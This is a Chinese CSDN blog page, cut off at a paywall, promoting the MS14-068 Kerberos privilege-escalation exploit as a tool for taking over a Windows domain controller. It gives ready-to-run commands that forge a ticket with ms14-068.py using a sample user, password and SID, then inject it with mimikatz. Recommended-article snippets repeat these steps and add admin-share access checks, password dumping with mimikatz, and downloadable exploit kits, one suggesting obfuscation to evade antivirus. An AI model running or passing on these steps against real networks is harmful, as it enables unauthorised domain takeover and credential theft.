域内提权神器 MS14-068 完整EXP

最新推荐文章于 2024-03-28 22:14:47 发布
最新推荐文章于 2024-03-28 22:14:47 发布
阅读量595 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shaolj666/article/details/109014770
版权

提权:

会提权的兄弟应该都知道 域的权限是整个局域网最高统治权 当我们拿下一台服务器 只是域下的一台机器 这时候 就会想尽办法 拿下域控制服务器

不知道的可看本博客之前做的教程

可以让任何域内用户提升为域管理员

使用命令:

c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
mimikatz.exe “kerberos::ptc TGT_k8test3@k8.local.ccache” exit

在这里插入图片描述
在这里插入图片描述
ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to ge

最低0.47元/天 解锁文章
赫壑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
MS14-068提权
weixin_30402343的博客
06-18 236
Ms14-068 • 库 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷贝 TGT_user1@lab.com.ccache 到windows系统 • 本地管理员登陆 • mimikatz...
10、内网安全-横向移动&提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
xnxqwzy的博客
03-27 860
我个人学习是通过课程和以上文章,漏洞利用的话,基本上就是根据复现文章一步一步实现,对于提权的漏洞编号还是得记一记,这些常识可能面试会问到,像CVE-2017-0146(ms17-010) 要做到耳熟能详。
用户提权 MS14-068(CVE-2014-6324)
qq_46635165的博客
11-17 810
环境 & 工具: win2008 --控 – 192.168.3.133 win2012 --内主机 – 192.168.3.132 :qf.com 内普通用户:sh 密码:123.com pyKEK工具包下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068 应用环境:已拥有一个内用户的用户名和密码以及该用户的sid,获取了内一台主机的权限 1,使用普通用户登录内主机Win2012,
MS14-058提权神器
09-24
MS14-058 提权 windows提权
WINDOWS 控环境下程序提权安装包制作程序工具及教程.7z
06-23
WINDOWS 控环境下,普通用户提权运行应用程序,解决部分应用程序必须以计算机管理员才能运行,本质上提权也是计算机管理员运行,只是加密了管理员账号密码,普通用户无法直接看到。
ms14-068.exe神器
11-25
ms14-068.exe神器
必备神器->MYSQL高版本提权工具-V 2011
01-19
必备神器->MYSQL高版本提权工具-V 2011
暗月mysql全版本通杀提权神器-V2014
01-13
暗月mysql全版本通杀提权神器-V2014,亲测真实有效,可用。如有侵权,请联系CSDN管理员删除即可
用户提权
wuxinweii的博客
11-21 3531
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个普通用户,将自己提升至管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
环境提权
qq_44657899的博客
11-09 3682
文章目录NetLogon特权提权漏洞(CVE-2020-1472)复现 NetLogon特权提权漏洞(CVE-2020-1472)复现 简介 CVE-2020-1472是一个windows控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与控间易受攻击的安全通道时,可利用此漏洞获取管访问权限。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-
ms14-068利用工具包.zip
07-01
包含了minikatazx64位,以及MS14-068.exe和ms14-068.exe。工具可以放心使用。无后门,如果需要免杀可以自行混淆加壳
MS14-068权限提升漏洞利用
cj_Hydra's Blog
02-15 1725
前言: 在写该篇文章之前,本人已经写过了关于渗透之黄金票据和白银票据的利用方式,今天的内容也是关于渗透提权的利用,并且MS14-068这个exp也是由kerberos协议而来。 在实际的渗透过程中,获得了一个成员(非管理员)的账号后,如果刚好控机器未打补丁(KB3011780)这是官方给出的修复补丁,那么就可以利用MS14-068exp来快速获得控权限。 利用方式: 1:用户和密码 ...
ms14-068提权
zz_strive_2012的专栏
06-17 2445
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
[译]使用Kerberos Exploitation Kit攻击MS14-068漏洞
iteye_16188的博客
12-14 409
原文地址:http://adsecurity.org/?p=676 Kerberos漏洞允许攻击者提权用户成为管理员账户。攻击者可以使用这些权限来访问中任何机器,包含DC。攻击者必须有一个口令来进行这种攻击 本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC [color=blue][b]开始攻击[/b][/col...
渗透之内网提权
hackzkaq的博客
11-12 2668
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 在windows中,权限种类还是比较多,但我们涉及到的基本就三个 User(普通用户权限)、Administrator(管理员权限)和system(系统权限) 一、提权方法 常用的提权方法 系统内核溢出提权 数据库提权 错误的系统配置提权 组策略首选项提权 DLL劫持提权 滥用高权限令牌提权 第三方软件/服务提权 二、内核溢出提权 电脑里的数据就好比水缸里的水,正常情况下水满了就不会在向水缸里注水 如果继续注入,水就会溢出到外界从而污染外界
提权MS14-068
good good study
03-17 4669
目标:普通成员——>管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
控服务器通过策略提升普通用户权限
u014588173的博客
11-16 2031
提升普通用户权限,用于普通用户安装软件 1.在控主机上添加一条GPO,指向需要权限的OU 2.编辑GPO-用户配置-控制面板设置-本地用户和组 3.然后右击-新建-本地组 4.操作选:更新, 组名选Administrators(内置),勾选选加当前用户 设置完成后,服务器更新组策略(gpupdate) 然后到用户电脑,注销当前登录或重启电脑。用户就有本机管理员的权限了
权限提升-Win系统权限提升篇&AD内网控&NetLogon&ADCS&PAC&KDC&CVE漏洞
最新发布
siu~
03-28 1137
1、WIN-内用户到AD控-CVE-2014-6324 2、WIN-内用户到AD控-CVE-2020-1472 3、WIN-内用户到AD控-CVE-2021-42287 4、WIN-内用户到AD控-CVE-2022-26923 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、控权限提升及转移
基友菊花暴必备神器--mysql高级提权工具
09-07
mysql高级提权工具是一种用于在mysql数据库中获取更高权限的软件。在日常使用中,我们可能会遇到需要更高级别权限操作数据库的情况,比如修改敏感数据、添加管理员账号等。而这些操作通常要求具备更高级别的权限才能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值